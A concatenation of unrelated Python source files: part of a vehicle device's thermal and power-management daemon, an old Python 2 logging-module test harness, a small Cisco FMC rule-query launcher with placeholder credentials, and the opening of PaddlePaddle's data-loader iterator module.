os.system("echo 2 > /sys/module/dwc3_msm/parameters/otg_switch")
last_eon_fan_val = None
def set_eon_fan(val):
global last_eon_fan_val
if last_eon_fan_val is None or last_eon_fan_val != val:
bus = SMBus(7, force=True)
try:
i = [0x1, 0x3 | 0, 0x3 | 0x08, 0x3 | 0x10][val]
bus.write_i2c_block_data(0x3d, 0, [i])
except OSError:
# tusb320
if val == 0:
bus.write_i2c_block_data(0x67, 0xa, [0])
else:
bus.write_i2c_block_data(0x67, 0xa, [0x20])
bus.write_i2c_block_data(0x67, 0x8, [(val - 1) << 6])
bus.close()
last_eon_fan_val = val
# temp thresholds to control fan speed - high hysteresis
_TEMP_THRS_H = [50., 65., 80., 10000]
# temp thresholds to control fan speed - low hysteresis
_TEMP_THRS_L = [42.5, 57.5, 72.5, 10000]
# fan speed options
_FAN_SPEEDS = [0, 16384, 32768, 65535]
def handle_fan_eon(controller, max_cpu_temp, fan_speed, ignition):
new_speed_h = next(speed for speed, temp_h in zip(_FAN_SPEEDS, _TEMP_THRS_H) if temp_h > max_cpu_temp)
new_speed_l = next(speed for speed, temp_l in zip(_FAN_SPEEDS, _TEMP_THRS_L) if temp_l > max_cpu_temp)
if new_speed_h > fan_speed:
# update speed if using the high thresholds results in fan speed increment
fan_speed = new_speed_h
elif new_speed_l < fan_speed:
# update speed if using the low thresholds results in fan speed decrement
fan_speed = new_speed_l
set_eon_fan(fan_speed // 16384)
return fan_speed
def handle_fan_uno(controller, max_cpu_temp, fan_speed, ignition):
new_speed = int(interp(max_cpu_temp, [40.0, 80.0], [0, 80]))
if not ignition:
new_speed = min(30, new_speed)
return new_speed
last_ignition = False
def handle_fan_tici(controller, max_cpu_temp, fan_speed, ignition):
global last_ignition
controller.neg_limit = -(80 if ignition else 30)
controller.pos_limit = -(30 if ignition else 0)
if ignition != last_ignition:
controller.reset()
fan_pwr_out = -int(controller.update(
setpoint=75,
measurement=max_cpu_temp,
feedforward=interp(max_cpu_temp, [60.0, 100.0], [0, -80])
))
last_ignition = ignition
return fan_pwr_out
def set_offroad_alert_if_changed(offroad_alert: str, show_alert: bool, extra_text: Optional[str]=None):
if prev_offroad_states.get(offroad_alert, None) == (show_alert, extra_text):
return
prev_offroad_states[offroad_alert] = (show_alert, extra_text)
set_offroad_alert(offroad_alert, show_alert, extra_text)
def hw_state_thread(end_event, hw_queue):
"""Handles non critical hardware state, and sends over queue"""
count = 0
registered_count = 0
while not end_event.is_set():
# these are expensive calls. update every 10s
if (count % int(10. / DT_TRML)) == 0:
try:
network_type = HARDWARE.get_network_type()
hw_state = HardwareState(
network_type=network_type,
network_strength=HARDWARE.get_network_strength(network_type),
network_info=HARDWARE.get_network_info(),
nvme_temps=HARDWARE.get_nvme_temperatures(),
modem_temps=HARDWARE.get_modem_temperatures(),
)
try:
hw_queue.put_nowait(hw_state)
except queue.Full:
pass
if TICI and (hw_state.network_info is not None) and (hw_state.network_info.get('state', None) == "REGISTERED"):
registered_count += 1
else:
registered_count = 0
if registered_count > 10:
cloudlog.warning(f"Modem stuck in registered state {hw_state.network_info}. nmcli conn up lte")
os.system("nmcli conn up lte")
registered_count = 0
except Exception:
cloudlog.exception("Error getting network status")
count += 1
time.sleep(DT_TRML)
def thermald_thread(end_event, hw_queue):
pm = messaging.PubMaster(['deviceState'])
sm = messaging.SubMaster(["peripheralState", "gpsLocationExternal", "controlsState", "pandaStates"], poll=["pandaStates"])
fan_speed = 0
count = 0
onroad_conditions: Dict[str, bool] = {
"ignition": False,
}
startup_conditions: Dict[str, bool] = {}
startup_conditions_prev: Dict[str, bool] = {}
off_ts = None
started_ts = None
started_seen = False
thermal_status = ThermalStatus.green
usb_power = True
last_hw_state = HardwareState(
network_type=NetworkType.none,
network_strength=NetworkStrength.unknown,
network_info=None,
nvme_temps=[],
modem_temps=[],
)
current_filter = FirstOrderFilter(0., CURRENT_TAU, DT_TRML)
temp_filter = FirstOrderFilter(0., TEMP_TAU, DT_TRML)
should_start_prev = False
in_car = False
handle_fan = None
is_uno = False
engaged_prev = False
params = Params()
power_monitor = PowerMonitoring()
HARDWARE.initialize_hardware()
thermal_config = HARDWARE.get_thermal_config()
# TODO: use PI controller for UNO
controller = PIController(k_p=0, k_i=2e-3, neg_limit=-80, pos_limit=0, rate=(1 / DT_TRML))
while not end_event.is_set():
sm.update(PANDA_STATES_TIMEOUT)
pandaStates = sm['pandaStates']
peripheralState = sm['peripheralState']
msg = read_thermal(thermal_config)
if sm.updated['pandaStates'] and len(pandaStates) > 0:
# Set ignition based on any panda connected
onroad_conditions["ignition"] = any(ps.ignitionLine or ps.ignitionCan for ps in pandaStates if ps.pandaType != log.PandaState.PandaType.unknown)
pandaState = pandaStates[0]
in_car = pandaState.harnessStatus != log.PandaState.HarnessStatus.notConnected
usb_power = peripheralState.usbPowerMode != log.PeripheralState.UsbPowerMode.client
# Setup fan handler on first connect to panda
if handle_fan is None and peripheralState.pandaType != log.PandaState.PandaType.unknown:
is_uno = peripheralState.pandaType == log.PandaState.PandaType.uno
if TICI:
cloudlog.info("Setting up TICI fan handler")
handle_fan = handle_fan_tici
elif is_uno or PC:
cloudlog.info("Setting up UNO fan handler")
handle_fan = handle_fan_uno
else:
cloudlog.info("Setting up EON fan handler")
setup_eon_fan()
handle_fan = handle_fan_eon
try:
last_hw_state = hw_queue.get_nowait()
except queue.Empty:
pass
msg.deviceState.freeSpacePercent = get_available_percent(default=100.0)
msg.deviceState.memoryUsagePercent = int(round(psutil.virtual_memory().percent))
msg.deviceState.cpuUsagePercent = [int(round(n)) for n in psutil.cpu_percent(percpu=True)]
msg.deviceState.gpuUsagePercent = int(round(HARDWARE.get_gpu_usage_percent()))
msg.deviceState.networkType = last_hw_state.network_type
msg.deviceState.networkStrength = last_hw_state.network_strength
if last_hw_state.network_info is not None:
msg.deviceState.networkInfo = last_hw_state.network_info
msg.deviceState.nvmeTempC = last_hw_state.nvme_temps
msg.deviceState.modemTempC = last_hw_state.modem_temps
msg.deviceState.screenBrightnessPercent = HARDWARE.get_screen_brightness()
msg.deviceState.batteryPercent = HARDWARE.get_battery_capacity()
msg.deviceState.batteryCurrent = HARDWARE.get_battery_current()
msg.deviceState.usbOnline = HARDWARE.get_usb_present()
current_filter.update(msg.deviceState.batteryCurrent / 1e6)
max_comp_temp = temp_filter.update(
max(max(msg.deviceState.cpuTempC), msg.deviceState.memoryTempC, max(msg.deviceState.gpuTempC))
)
if handle_fan is not None:
fan_speed = handle_fan(controller, max_comp_temp, fan_speed, onroad_conditions["ignition"])
msg.deviceState.fanSpeedPercentDesired = fan_speed
is_offroad_for_5_min = (started_ts is None) and ((not started_seen) or (off_ts is None) or (sec_since_boot() - off_ts > 60 * 5))
if is_offroad_for_5_min and max_comp_temp > OFFROAD_DANGER_TEMP:
# If device is offroad we want to cool down before going onroad
# since going onroad increases load and can make temps go over 107
thermal_status = ThermalStatus.danger
else:
current_band = THERMAL_BANDS[thermal_status]
band_idx = list(THERMAL_BANDS.keys()).index(thermal_status)
if current_band.min_temp is not None and max_comp_temp < current_band.min_temp:
thermal_status = list(THERMAL_BANDS.keys())[band_idx - 1]
elif current_band.max_temp is not None and max_comp_temp > current_band.max_temp:
thermal_status = list(THERMAL_BANDS.keys())[band_idx + 1]
# **** starting logic ****
# Ensure date/time are valid
now = datetime.datetime.utcnow()
startup_conditions["time_valid"] = (now.year > 2020) or (now.year == 2020 and now.month >= 10)
set_offroad_alert_if_changed("Offroad_InvalidTime", (not startup_conditions["time_valid"]))
startup_conditions["up_to_date"] = params.get("Offroad_ConnectivityNeeded") is None or params.get_bool("DisableUpdates") or params.get_bool("SnoozeUpdate")
startup_conditions["not_uninstalling"] = not params.get_bool("DoUninstall")
startup_conditions["accepted_terms"] = params.get("HasAcceptedTerms") == terms_version
# with 2% left, we killall, otherwise the phone will take a long time to boot
startup_conditions["free_space"] = msg.deviceState.freeSpacePercent > 2
startup_conditions["completed_training"] = params.get("CompletedTrainingVersion") == training_version or \
params.get_bool("Passive")
startup_conditions["not_driver_view"] = not params.get_bool("IsDriverViewEnabled")
startup_conditions["not_taking_snapshot"] = not params.get_bool("IsTakingSnapshot")
# if any CPU gets above 107 or the battery gets above 63, kill all processes
# controls will warn with CPU above 95 or battery above 60
onroad_conditions["device_temp_good"] = thermal_status < ThermalStatus.danger
set_offroad_alert_if_changed("Offroad_TemperatureTooHigh", (not onroad_conditions["device_temp_good"]))
if TICI:
missing = (not Path("/data/media").is_mount()) and (not os.path.isfile("/persist/comma/living-in-the-moment"))
set_offroad_alert_if_changed("Offroad_StorageMissing", missing)
# Handle offroad/onroad transition
should_start = all(onroad_conditions.values())
if started_ts is None:
should_start = should_start and all(startup_conditions.values())
if should_start != should_start_prev or (count == 0):
params.put_bool("IsOnroad", should_start)
params.put_bool("IsOffroad", not should_start)
params.put_bool("IsEngaged", False)
engaged_prev = False
HARDWARE.set_power_save(not should_start)
if sm.updated['controlsState']:
engaged = sm['controlsState'].enabled
if engaged != engaged_prev:
params.put_bool("IsEngaged", engaged)
engaged_prev = engaged
try:
with open('/dev/kmsg', 'w') as kmsg:
kmsg.write(f"<3>[thermald] engaged: {engaged}\n")
except Exception:
pass
if should_start:
off_ts = None
if started_ts is None:
started_ts = sec_since_boot()
started_seen = True
else:
if onroad_conditions["ignition"] and (startup_conditions != startup_conditions_prev):
cloudlog.event("Startup blocked", startup_conditions=startup_conditions, onroad_conditions=onroad_conditions)
started_ts = None
if off_ts is None:
off_ts = sec_since_boot()
# Offroad power monitoring
power_monitor.calculate(peripheralState, onroad_conditions["ignition"])
msg.deviceState.offroadPowerUsageUwh = power_monitor.get_power_used()
msg.deviceState.carBatteryCapacityUwh = max(0, power_monitor.get_car_battery_capacity())
current_power_draw = HARDWARE.get_current_power_draw() # pylint: disable=assignment-from-none
msg.deviceState.powerDrawW = current_power_draw if current_power_draw is not None else 0
# Check if we need to disable charging (handled by boardd)
msg.deviceState.chargingDisabled = power_monitor.should_disable_charging(onroad_conditions["ignition"], in_car, off_ts)
# Check if we need to shut down
if power_monitor.should_shutdown(peripheralState, onroad_conditions["ignition"], in_car, off_ts, started_seen):
cloudlog.warning(f"shutting device down, offroad since {off_ts}")
params.put_bool("DoShutdown", True)
msg.deviceState.chargingError = current_filter.x > 0. and msg.deviceState.batteryPercent < 90 # if current is positive, then battery is being discharged
msg.deviceState.started = started_ts is not None
msg.deviceState.startedMonoTime = int(1e9*(started_ts or 0))
last_ping = params.get("LastAthenaPingTime")
if last_ping is not None:
msg.deviceState.lastAthenaPingTime = int(last_ping)
msg.deviceState.thermalStatus = thermal_status
pm.send("deviceState", msg)
if EON and not is_uno:
set_offroad_alert_if_changed("Offroad_ChargeDisabled", (not usb_power))
should_start_prev = should_start
startup_conditions_prev = startup_conditions.copy()
# Log to statsd
statlog.gauge("free_space_percent", msg.deviceState.freeSpacePercent)
statlog.gauge("gpu_usage_percent", msg.deviceState.gpuUsagePercent)
statlog.gauge("memory_usage_percent", msg.deviceState.memoryUsagePercent)
for i, usage in enumerate(msg.deviceState.cpuUsagePercent):
statlog.gauge(f"cpu{i}_usage_percent", usage)
for i, temp in enumerate(msg.deviceState.cpuTempC):
statlog.gauge(f"cpu{i}_temperature", temp)
for i, temp in enumerate(msg.deviceState.gpuTempC):
statlog.gauge(f"gpu{i}_temperature", temp)
statlog.gauge("memory_temperature", msg.deviceState.memoryTempC)
statlog.gauge("ambient_temperature", msg.deviceState.ambientTempC)
for i, temp in enumerate(msg.deviceState.pmicTempC):
statlog.gauge(f"pmic{i}_temperature", temp)
for i, temp in enumerate(last_hw_state.nvme_temps):
statlog.gauge(f"nvme_temperature{i}", temp)
for i, temp in enumerate(last_hw_state.modem_temps):
statlog.gauge(f"modem_temperature{i}", temp)
statlog.gauge("fan_speed_percent_desired", msg.deviceState.fanSpeedPercentDesired)
statlog.gauge("screen_brightness_percent", msg.deviceState.screenBrightnessPercent)
# report to server once every 10 minutes
if (count % int(600. / DT_TRML)) == 0:
if EON and started_ts is None and msg.deviceState.memoryUsagePercent > 40:
cloudlog.event("High offroad memory usage", mem=msg.deviceState.memoryUsagePercent)
cloudlog.event("STATUS_PACKET",
count=count,
pandaStates=[strip_deprecated_keys(p.to_dict()) for p in pandaStates],
peripheralState=strip_deprecated_keys(peripheralState.to_dict()),
location=(strip_deprecated_keys(sm["gpsLocationExternal"].to_dict()) if sm.alive["gpsLocationExternal"] else None),
deviceState=strip_deprecated_keys(msg.to_dict()))
count += 1
def main():
hw_queue = queue.Queue(maxsize=1)
end_event = threading.Event()
threads = [
threading.Thread(target=hw_state_thread, args=(end_event, hw_queue)),
threading.Thread(target=thermald_thread, args=(end_event, hw_queue)),
]
for t in threads:
t.start()
try:
while True:
time.sleep(1)
if not all(t.is_alive() for t in threads):
break
finally:
end_event.set()
for t in threads:
t.join()
if __name__ == "__main__":
main()
|
test_logging.py
|
#!/usr/bin/env python
#
# Copyright 2001-2004 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
# This file is part of the Python logging distribution. See
# http://www.red-dove.com/python_logging.html
#
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2002 Vinay Sajip. All Rights Reserved.
"""
import select
import os, sys, string, struct, types, cPickle, cStringIO
import socket, threading, time
import logging, logging.handlers, logging.config
BANNER = "-- %-10s %-6s ---------------------------------------------------\n"
FINISH_UP = "Finish up, it's closing time. Messages should bear numbers 0 through 24."
#----------------------------------------------------------------------------
# Log receiver
#----------------------------------------------------------------------------
TIMEOUT = 10
from SocketServer import ThreadingTCPServer, StreamRequestHandler
class LogRecordStreamHandler(StreamRequestHandler):
"""
Handler for a streaming logging request. It basically logs the record
using whatever logging policy is configured locally.
"""
def handle(self):
"""
Handle multiple requests - each expected to be a 4-byte length,
followed by the LogRecord in pickle format. Logs the record
according to whatever policy is configured locally.
"""
while 1:
try:
chunk = self.connection.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = self.connection.recv(slen)
while len(chunk) < slen:
chunk = chunk + self.connection.recv(slen - len(chunk))
obj = self.unPickle(chunk)
record = logging.makeLogRecord(obj)
self.handleLogRecord(record)
except:
raise
def unPickle(self, data):
return cPickle.loads(data)
def handleLogRecord(self, record):
logname = "logrecv.tcp." + record.name
#If the end-of-messages sentinel is seen, tell the server to terminate
if record.msg == FINISH_UP:
self.server.abort = 1
record.msg = record.msg + " (via " + logname + ")"
logger = logging.getLogger(logname)
logger.handle(record)
# The server sets socketDataProcessed when it's done.
socketDataProcessed = threading.Event()
class LogRecordSocketReceiver(ThreadingTCPServer):
"""
A simple-minded TCP socket-based logging receiver suitable for test
purposes.
"""
allow_reuse_address = 1
def __init__(self, host='localhost',
port=logging.handlers.DEFAULT_TCP_LOGGING_PORT,
handler=LogRecordStreamHandler):
ThreadingTCPServer.__init__(self, (host, port), handler)
self.abort = 0
self.timeout = 1
def serve_until_stopped(self):
abort = 0
while not abort:
rd, wr, ex = select.select([self.socket.fileno()],
[], [],
self.timeout)
if rd:
self.handle_request()
abort = self.abort
#notify the main thread that we're about to exit
socketDataProcessed.set()
def process_request(self, request, client_address):
#import threading
t = threading.Thread(target = self.finish_request,
args = (request, client_address))
t.start()
def runTCP(tcpserver):
tcpserver.serve_until_stopped()
#----------------------------------------------------------------------------
# Test 0
#----------------------------------------------------------------------------
msgcount = 0
def nextmessage():
global msgcount
rv = "Message %d" % msgcount
msgcount = msgcount + 1
return rv
def test0():
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
#These should log
ERR.log(logging.FATAL, nextmessage())
ERR.error(nextmessage())
INF.log(logging.FATAL, nextmessage())
INF.error(nextmessage())
INF.warn(nextmessage())
INF.info(nextmessage())
INF_UNDEF.log(logging.FATAL, nextmessage())
INF_UNDEF.error(nextmessage())
INF_UNDEF.warn (nextmessage())
INF_UNDEF.info (nextmessage())
INF_ERR.log(logging.FATAL, nextmessage())
INF_ERR.error(nextmessage())
INF_ERR_UNDEF.log(logging.FATAL, nextmessage())
INF_ERR_UNDEF.error(nextmessage())
DEB.log(logging.FATAL, nextmessage())
DEB.error(nextmessage())
DEB.warn (nextmessage())
DEB.info (nextmessage())
DEB.debug(nextmessage())
UNDEF.log(logging.FATAL, nextmessage())
UNDEF.error(nextmessage())
UNDEF.warn (nextmessage())
UNDEF.info (nextmessage())
GRANDCHILD.log(logging.FATAL, nextmessage())
CHILD.log(logging.FATAL, nextmessage())
#These should not log
ERR.warn(nextmessage())
ERR.info(nextmessage())
ERR.debug(nextmessage())
INF.debug(nextmessage())
INF_UNDEF.debug(nextmessage())
INF_ERR.warn(nextmessage())
INF_ERR.info(nextmessage())
INF_ERR.debug(nextmessage())
INF_ERR_UNDEF.warn(nextmessage())
INF_ERR_UNDEF.info(nextmessage())
INF_ERR_UNDEF.debug(nextmessage())
INF.info(FINISH_UP)
#----------------------------------------------------------------------------
# Test 1
#----------------------------------------------------------------------------
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 10
TACITURN = 9
TERSE = 8
EFFUSIVE = 7
SOCIABLE = 6
VERBOSE = 5
TALKATIVE = 4
GARRULOUS = 3
CHATTERBOX = 2
BORING = 1
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
#
# Now, to demonstrate filtering: suppose for some perverse reason we only
# want to print out all except GARRULOUS messages. Let's create a filter for
# this purpose...
#
class SpecificLevelFilter(logging.Filter):
def __init__(self, lvl):
self.level = lvl
def filter(self, record):
return self.level != record.levelno
class GarrulousFilter(SpecificLevelFilter):
def __init__(self):
SpecificLevelFilter.__init__(self, GARRULOUS)
#
# Now, let's demonstrate filtering at the logger. This time, use a filter
# which excludes SOCIABLE and TACITURN messages. Note that GARRULOUS events
# are still excluded.
#
class VerySpecificFilter(logging.Filter):
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
def message(s):
sys.stdout.write("%s\n" % s)
SHOULD1 = "This should only be seen at the '%s' logging level (or lower)"
def test1():
#
# Now, tell the logging system to associate names with our levels.
#
for lvl in my_logging_levels.keys():
logging.addLevelName(lvl, my_logging_levels[lvl])
#
# Now, define a test function which logs an event at each of our levels.
#
def doLog(log):
for lvl in LEVEL_RANGE:
log.log(lvl, SHOULD1, logging.getLevelName(lvl))
log = logging.getLogger("")
hdlr = log.handlers[0]
#
# Set the logging level to each different value and call the utility
# function to log events.
# In the output, you should see that each time round the loop, the number of
# logging events which are actually output decreases.
#
for lvl in LEVEL_RANGE:
message("-- setting logging level to '%s' -----" %
logging.getLevelName(lvl))
log.setLevel(lvl)
doLog(log)
#
# Now, we demonstrate level filtering at the handler level. Tell the
# handler defined above to filter at level 'SOCIABLE', and repeat the
# above loop. Compare the output from the two runs.
#
hdlr.setLevel(SOCIABLE)
message("-- Filtering at handler level to SOCIABLE --")
for lvl in LEVEL_RANGE:
message("-- setting logging level to '%s' -----" %
logging.getLevelName(lvl))
log.setLevel(lvl)
doLog(log)
hdlr.setLevel(0) #turn off level filtering at the handler
garr = GarrulousFilter()
hdlr.addFilter(garr)
message("-- Filtering using GARRULOUS filter --")
for lvl in LEVEL_RANGE:
message("-- setting logging level to '%s' -----" %
logging.getLevelName(lvl))
log.setLevel(lvl)
doLog(log)
spec = VerySpecificFilter()
log.addFilter(spec)
message("-- Filtering using specific filter for SOCIABLE, TACITURN --")
for lvl in LEVEL_RANGE:
message("-- setting logging level to '%s' -----" %
logging.getLevelName(lvl))
log.setLevel(lvl)
doLog(log)
log.removeFilter(spec)
hdlr.removeFilter(garr)
#Undo the one level which clashes...for regression tests
logging.addLevelName(logging.DEBUG, "DEBUG")
#----------------------------------------------------------------------------
# Test 2
#----------------------------------------------------------------------------
MSG = "-- logging %d at INFO, messages should be seen every 10 events --"
def test2():
logger = logging.getLogger("")
sh = logger.handlers[0]
sh.close()
logger.removeHandler(sh)
mh = logging.handlers.MemoryHandler(10,logging.WARNING, sh)
logger.setLevel(logging.DEBUG)
logger.addHandler(mh)
message("-- logging at DEBUG, nothing should be seen yet --")
logger.debug("Debug message")
message("-- logging at INFO, nothing should be seen yet --")
logger.info("Info message")
message("-- logging at WARNING, 3 messages should be seen --")
logger.warn("Warn message")
for i in xrange(102):
message(MSG % i)
logger.info("Info index = %d", i)
mh.close()
logger.removeHandler(mh)
logger.addHandler(sh)
#----------------------------------------------------------------------------
# Test 3
#----------------------------------------------------------------------------
FILTER = "a.b"
def doLog3():
logging.getLogger("a").info("Info 1")
logging.getLogger("a.b").info("Info 2")
logging.getLogger("a.c").info("Info 3")
logging.getLogger("a.b.c").info("Info 4")
logging.getLogger("a.b.c.d").info("Info 5")
logging.getLogger("a.bb.c").info("Info 6")
logging.getLogger("b").info("Info 7")
logging.getLogger("b.a").info("Info 8")
logging.getLogger("c.a.b").info("Info 9")
logging.getLogger("a.bb").info("Info 10")
def test3():
root = logging.getLogger()
root.setLevel(logging.DEBUG)
hand = root.handlers[0]
message("Unfiltered...")
doLog3()
message("Filtered with '%s'..." % FILTER)
filt = logging.Filter(FILTER)
hand.addFilter(filt)
doLog3()
hand.removeFilter(filt)
#----------------------------------------------------------------------------
# Test Harness
#----------------------------------------------------------------------------
def banner(nm, typ):
sep = BANNER % (nm, typ)
sys.stdout.write(sep)
sys.stdout.flush()
def test_main_inner():
rootLogger = logging.getLogger("")
rootLogger.setLevel(logging.DEBUG)
hdlr = logging.StreamHandler(sys.stdout)
fmt = logging.Formatter(logging.BASIC_FORMAT)
hdlr.setFormatter(fmt)
rootLogger.addHandler(hdlr)
#Set up a handler such that all events are sent via a socket to the log
#receiver (logrecv).
#The handler will only be added to the rootLogger for some of the tests
shdlr = logging.handlers.SocketHandler('localhost',
logging.handlers.DEFAULT_TCP_LOGGING_PORT)
#Configure the logger for logrecv so events do not propagate beyond it.
#The sockLogger output is buffered in memory until the end of the test,
#and printed at the end.
sockOut = cStringIO.StringIO()
sockLogger = logging.getLogger("logrecv")
sockLogger.setLevel(logging.DEBUG)
sockhdlr = logging.StreamHandler(sockOut)
sockhdlr.setFormatter(logging.Formatter(
"%(name)s -> %(levelname)s: %(message)s"))
sockLogger.addHandler(sockhdlr)
sockLogger.propagate = 0
#Set up servers
threads = []
tcpserver = LogRecordSocketReceiver()
#sys.stdout.write("About to start TCP server...\n")
threads.append(threading.Thread(target=runTCP, args=(tcpserver,)))
for thread in threads:
thread.start()
try:
banner("log_test0", "begin")
rootLogger.addHandler(shdlr)
test0()
shdlr.close()
rootLogger.removeHandler(shdlr)
banner("log_test0", "end")
banner("log_test1", "begin")
test1()
banner("log_test1", "end")
banner("log_test2", "begin")
test2()
banner("log_test2", "end")
banner("log_test3", "begin")
test3()
banner("log_test3", "end")
finally:
#wait for TCP receiver to terminate
socketDataProcessed.wait()
for thread in threads:
thread.join()
banner("logrecv output", "begin")
sys.stdout.write(sockOut.getvalue())
sockOut.close()
sockLogger.removeHandler(sockhdlr)
sockhdlr.close()
banner("logrecv output", "end")
sys.stdout.flush()
try:
hdlr.close()
except:
pass
rootLogger.removeHandler(hdlr)
def test_main():
import locale
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first so we can restore it at the end.
try:
original_locale = locale.setlocale(locale.LC_ALL)
locale.setlocale(locale.LC_ALL, '')
except (ValueError, locale.Error):
# this happens on a Solaris box which only supports "C" locale
# or a Mac OS X box which supports very little locale stuff at all
original_locale = None
# Save and restore the original root logger level across the tests.
# Otherwise, e.g., if any test using cookielib runs after test_logging,
# cookielib's debug-level logger tries to log messages, leading to
# confusing:
# No handlers could be found for logger "cookielib"
# output while the tests are running.
root_logger = logging.getLogger("")
original_logging_level = root_logger.getEffectiveLevel()
try:
test_main_inner()
finally:
if original_locale is not None:
locale.setlocale(locale.LC_ALL, original_locale)
root_logger.setLevel(original_logging_level)
if __name__ == "__main__":
sys.stdout.write("test_logging\n")
test_main()
|
FMC_Initiator.py
|
import socket
import FMC
import ipaddress
from multiprocessing import Process
import time
nic_list = []
def get_nic_ip():
addrs = socket.getaddrinfo(socket.gethostname(), None)
for i in addrs:
for i in i:
try:
nic_list.append(ipaddress.IPv4Address(i[0]))
except (TypeError, IndexError, ValueError):
continue
return nic_list
# Credentials and FMC go in the funtion variables. Each username and password need to be unique. Manual entry for now.
def initiate_1(ip):
net_loc = "1.1.1.1"
username = "admin1"
password = "admin"
initiate_1 = FMC.fmc()
initiate_1.username = username
initiate_1.password = password
initiate_1.net_loc = net_loc
initiate_1.query = "?offset=1&limit=25"
initiate_1.ip = ip
initiate_1.get_rules()
def initiate_2(ip):
net_loc = "1.1.1.1"
username = "admin2"
password = "admin"
initiate_2 = FMC.fmc()
initiate_2.username = username
initiate_2.password = password
initiate_2.net_loc = net_loc
initiate_2.query = "?offset=501&limit=25"
initiate_2.ip = ip
initiate_2.get_rules()
def initiate_3(ip):
net_loc = "1.1.1.1"
username = "admin3"
password = "admin"
initiate_3 = FMC.fmc()
initiate_3.username = username
initiate_3.password = password
initiate_3.net_loc = net_loc
initiate_3.query = "?offset=1001&limit=25"
initiate_3.ip = ip
initiate_3.get_rules()
if __name__ == '__main__':
process_1 = Process(target=initiate_1, args=("YOUR IP HERE",)) # Your IP here
process_1.start()
time.sleep(10)
process_2 = Process(target=initiate_2, args=("YOUR IP HERE",)) # Your IP here
process_2.start()
time.sleep(10)
process_3 = Process(target=initiate_3, args=("YOUR IP HERE",)) # Your IP here
process_3.start()
stop = input("")
|
dataloader_iter.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import six
import sys
import time
import signal
import numbers
import logging
import itertools
import threading
import numpy as np
import multiprocessing
from collections import namedtuple
# NOTE: queue has a different name in python2 and python3
if six.PY2:
import Queue as queue
else:
import queue
import paddle
from .. import core, layers
from ..framework import in_dygraph_mode
from ..multiprocess_utils import CleanupFuncRegistrar, _cleanup_mmap, _set_SIGCHLD_handler
from .fetcher import _IterableDatasetFetcher, _MapDatasetFetcher
__all__ = ['get_worker_info']
# multi-process worker check indices queue interval, avoid
# hanging in subprocess data loading
MP_INDICES_CHECK_INTERVAL = 5
_IterableDatasetStopIteration = namedtuple('_IterableDatasetStopIteration',
['worker_id'])
def default_collate_fn(batch):
"""
Default batch collating function for :code:`fluid.io.DataLoader`,
batch should be a list of samples, and each sample should be a list
of fields as follows:
[[filed1, filed2, ...], [filed1, filed2, ...], ...]
This default collate function zipped each filed together and stack
each filed as the batch field as follows:
[batch_filed1, batch_filed2, ...]
Args:
batch(list of list of numpy array): the batch data, each fields
should be a numpy array, each sample should be a list of
fileds, and batch should be a list of sample.
Returns:
a list of numpy array: collated batch
"""
sample = batch[0]
# dataset has only 1 field
if isinstance(sample, np.ndarray):
return [np.stack(batch, axis=0)]
# batch each field
slots = []
for items in batch:
for i, item in enumerate(items):
if len(slots) < len(items):
slots.append([item])
else:
slots[i].append(item)
outputs = []
for slot in slots:
if isinstance(slot[0], (np.ndarray, np.bool, numbers.Number)):
tmp = np.stack(slot, axis=0)
outputs.append(tmp)
elif isinstance(slot[0], paddle.Tensor):
tmp = layers.stack(slot, axis=0)
outputs.append(tmp)
else:
raise RuntimeError("Unknown data type {}".format(type(slot[0])))
return outputs
class _DatasetKind(object):
MAP = 0
ITER = 1
@staticmethod
def create_fetcher(kind, dataset, collate_fn, drop_last):
if kind == _DatasetKind.MAP:
return _MapDatasetFetcher(dataset, collate_fn, drop_last)
elif kind == _DatasetKind.ITER:
